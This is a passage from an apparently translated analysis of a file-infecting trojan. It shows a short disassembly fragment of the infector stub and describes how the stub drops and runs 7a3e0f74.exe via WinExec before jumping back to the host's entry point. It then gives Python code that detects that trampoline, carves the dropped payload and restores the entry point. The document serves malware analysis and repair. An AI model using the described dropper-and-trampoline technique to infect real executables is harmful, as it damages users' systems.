    004602A8    8B45 80         MOV EAX,DWORD PTR SS:[EBP-0x80]          ; loaddll_.004602BA
    004602AB    40              INC EAX
    004602AC    8945 80         MOV DWORD PTR SS:[EBP-0x80],EAX
    004602AF  ^ EB AE           JMP SHORT 0046025F                       ; 0046025F
    004602B1    C9              LEAVE
    004602B2    83C4 04         ADD ESP,0x4                              ; the 8 bytes written earlier, so that once the trojan has finished it jumps to the uninfected program's entry
    004602B5  - E9 B6FDFAFF     JMP 00410070                             ; 00410070
    004602BA    4D              DEC EBP
    004602BB    5A              POP EDX                                  ; ntdll.KiFastSystemCallRet
    004602BC    90              NOP
    004602BD    0003            ADD BYTE PTR DS:[EBX],AL
    004602BF    0000            ADD BYTE PTR DS:[EAX],AL


    Summary:
    1. In the code above, the address of the function GetModuleHandleA in kernel32.dll is located first;
    2. Then GetModuleHandleA is used to locate the addresses of CreateFileA, WriteFile, CloseHandle, WinExec and so on. CreateFileA, WriteFile and CloseHandle are called to generate the trojan file 7a3e0f74.exe in the root of drive C, as shown in the figure:





    Finally WinExec is used to run the generated trojan file 7a3e0f74.exe, as shown in the figure:



    Because this trojan file deletes itself after running and executes some files that maliciously damage the system, the code at 004602A3 above is not executed.
    3. The main job of the infected file is to generate a trojan file named 7a3e0f74.exe and run it, so the key part is still in the generated file, which still has to be analyzed; in addition, the size of the infected file has changed.
    4. After finishing the above, the file jumps back to the entry of the uninfected file, as shown in the figure:
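    Recovering the original entry point from that trampoline, as an added example (not the repair tool the post mentions as a plan): the stub writes 83 C4 04 E9 <rel32> at the end of its own code, and the dropped PE's MZ header sits right behind it inside the 0x1F4-byte window the stub scans, so a scanner can key on that pair, compute OEP = address after the JMP + rel32 (004602BA + 0xFFFAFDB6 = 00410070 here), and carve the 0x14C00-byte payload for separate analysis. The byte region below is constructed from the values in the listing, and the PE32 header fed to patch_entry_point is a constructed minimal header with an assumed image base of 00400000; a full repair would also have to drop the appended section and fix SizeOfImage and the section table, which this example does not do.

```python
import re
import struct

# Constructed stand-in for the code the infector appended at 00460000: 0x2B2
# bytes of stub (zeroed here), the 8-byte trampoline the stub patches in at
# 004602B2 (83 C4 04 E9 B6 FD FA FF), then the dropped PE starting at 004602BA.
# A real sample carries 0x14C00 payload bytes; this one carries only a DOS header start.
STUB_VA = 0x00460000
STUB_LEN = 0x2B2
SAMPLE_REGION = (bytes(STUB_LEN)
                 + bytes.fromhex("83C404E9B6FDFAFF")
                 + b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xFF\xFF\x00\x00"
                 + bytes(0x100))

TRAMPOLINE = re.compile(rb"\x83\xC4\x04\xE9(.{4})", re.DOTALL)  # ADD ESP,4 ; JMP rel32
MZ_SCAN_WINDOW = 0x1F4    # the stub itself looks at most 0x1F4 bytes ahead for 'MZ'
MZ_MAGIC = b"MZ\x90\x00"  # the dword 0x00905A4D the stub compares against

def find_trampoline(region, region_va):
    """Return (offset of the trampoline, original entry point VA) or None.

    A match is only accepted when the dropped PE's 'MZ' header follows inside
    the window the stub scans, which filters out the same byte pattern
    occurring in ordinary code.
    """
    for m in TRAMPOLINE.finditer(region):
        off = m.start()
        if region.find(MZ_MAGIC, off + 8, off + 8 + MZ_SCAN_WINDOW) == -1:
            continue
        rel32 = struct.unpack("<i", m.group(1))[0]
        jmp_next = region_va + off + 8          # JMP rel32 sits at off+3 and is 5 bytes long
        return off, (jmp_next + rel32) & 0xFFFFFFFF
    return None

def carve_payload(region, region_va, size=0x14C00):
    """Return (original entry VA, dropped PE bytes) for an infected region, or None."""
    hit = find_trampoline(region, region_va)
    if hit is None:
        return None
    off, oep = hit
    mz = region.find(MZ_MAGIC, off + 8, off + 8 + MZ_SCAN_WINDOW)
    return oep, region[mz:mz + size]

def patch_entry_point(pe, oep):
    """Point AddressOfEntryPoint back at the recovered OEP; returns the patched bytes.

    Reads ImageBase from the PE32 optional header (NT headers + 0x34) and
    writes OEP - ImageBase to AddressOfEntryPoint (NT headers + 0x28).
    Removing the appended section is left to the caller.
    """
    pe = bytearray(pe)
    nt = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[nt:nt + 4] != b"PE\0\0" or struct.unpack_from("<H", pe, nt + 0x18)[0] != 0x10B:
        raise ValueError("not a PE32 file")
    image_base = struct.unpack_from("<I", pe, nt + 0x34)[0]
    struct.pack_into("<I", pe, nt + 0x28, (oep - image_base) & 0xFFFFFFFF)
    return bytes(pe)

def minimal_pe32_header(image_base, entry_rva):
    """Constructed PE32 header with just the fields patch_entry_point reads (assumed layout)."""
    hdr = bytearray(0x200)
    hdr[0:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x80)              # e_lfanew
    hdr[0x80:0x84] = b"PE\0\0"
    struct.pack_into("<H", hdr, 0x80 + 0x18, 0x10B)       # OptionalHeader.Magic: PE32
    struct.pack_into("<I", hdr, 0x80 + 0x28, entry_rva)  # AddressOfEntryPoint (infected)
    struct.pack_into("<I", hdr, 0x80 + 0x34, image_base) # ImageBase
    return bytes(hdr)

if __name__ == "__main__":
    oep, payload = carve_payload(SAMPLE_REGION, STUB_VA)
    print(f"original entry point: {oep:08X}, payload starts {payload[:2]!r}")
```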
